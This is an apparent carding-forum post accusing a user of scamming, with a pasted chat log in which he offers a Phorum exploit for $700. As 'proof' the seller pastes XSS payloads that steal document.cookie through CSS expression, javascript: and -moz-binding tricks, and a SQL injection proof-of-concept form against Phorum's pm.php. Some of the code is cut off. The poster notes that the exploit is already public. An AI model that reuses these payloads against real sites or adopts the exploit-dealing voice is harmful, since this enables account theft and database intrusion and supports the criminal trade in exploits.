Hey
carder2012 is a RIPPER
link to profile: http://carder.market/member.php?u=50788
So this retard tried to scam me for a Phorum exploit, which he obviously doesn't have. He said he worked with his team on it yesterday and he wants 700$ LR for it.
Chat logs from yahoo:
Code:
carder2012: expolit ready. guys dont want to share. howver ready to sell via escrow .safe and sound. let me know when you need.
3:31:21 PM
[email protected]: proof
3:31:57 PM
carder2012: escrow is proof of everything Man.
3:32:04 PM
[email protected]: no its not
3:32:16 PM
carder2012: you will pay money to 3rd party not us
3:32:22 PM
[email protected]: show me proof
3:32:27 PM
[email protected]: shouldnt be a problem for u
3:32:44 PM
carder2012: ok
3:34:07 PM
carder2012: sending a bit codes.
3:34:18 PM
carder2012: [size=20px;xss:expression(alert(document.cookie));]Sysdream Testing XSS[/size]
The application convert it into the follow HTML code :
<span style="color:#000000;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
and
<span style="font-size: 20px;xss:expression(alert(document.cookie));">Sysdream Testing XSS</span>
For IE6 you can use this POC:
[color=#000000;background-image:url(javascript:alert('Sysdream_IE6_Alert'));]Sysdream
Testing IE6[/color]
For IE7:
[color=#000000;xss:expression(alert('Sysdream_IE7_Alert'));]Sysdream Testing
XSS[/color]
Obviously, the POC doesn't work in IE8 and Firefox.
But, but , but...
Uploading htc (for IE8) or xml (for FF) file on the phorum using the "My
Files" function in "Control Center", you can use :
POC for FF:
[color=#000000;-moz-binding:
3:35:41 PM
carder2012: you know coding?
3:35:56 PM
[email protected]: how does this proove anything
3:36:18 PM
[email protected]: its some XSS
3:36:41 PM
[email protected]: "Obviously, the POC doesn't work in IE8 and Firefox."
3:37:01 PM
carder2012: very easy. i will describe and send all material you in email, or will upload and share link.
3:37:19 PM
carder2012: no. its only to show some or little info related
3:37:40 PM
carder2012: you know how important it is
3:37:42 PM
[email protected]: sorry but im not going to send you 700$ without any good proof
3:38:35 PM
carder2012: i am not greedy for $700. let me ask from guys.if they agree small upfront. i can send you all info
3:38:42 PM
carder2012: later we work for %
3:39:03 PM
carder2012: rest of work you do OK?
3:39:09 PM
[email protected]: im not paying anything upfront
3:39:11 PM
[email protected]: show me proof
3:39:14 PM
[email protected]: instead of some shitty code
3:39:24 PM
[email protected]: make screenshot
3:45:01 PM
carder2012: How to use file: full function
3:45:05 PM
carder2012: As we can see, if "$user_id" is array, then there is no sanitize against data before
using in sql query.
After some research I have found a way to use this bug for sql injection. For this,
first of all, potential attacker must have valid user account in specific Phorum-powered
website and he/she must be logged in. And then let's try this proof-of-concept html file:
------------------[PoC exploit]-----------------------
Zhtml>
Zbody>
<form action="http://localhost/phorum.5.1.20/pm.php" method="post">
<input type="hidden" name="recipients[1) OR foobar=123/* ]" value="waraxe">
<input type="submit" name"test" value="test">
</body>
</html>
------------------[/PoC exploit]----------------------
Of course, "action" parameter must be modified to match real target.
As testing result we will see s
3:45:37 PM
carder2012: Still not satisfy. then try your luck to find better guy
3:46:13 PM
[email protected]: http://www.exploit-db.com/exploits/9231/
Obvious scam is obvious.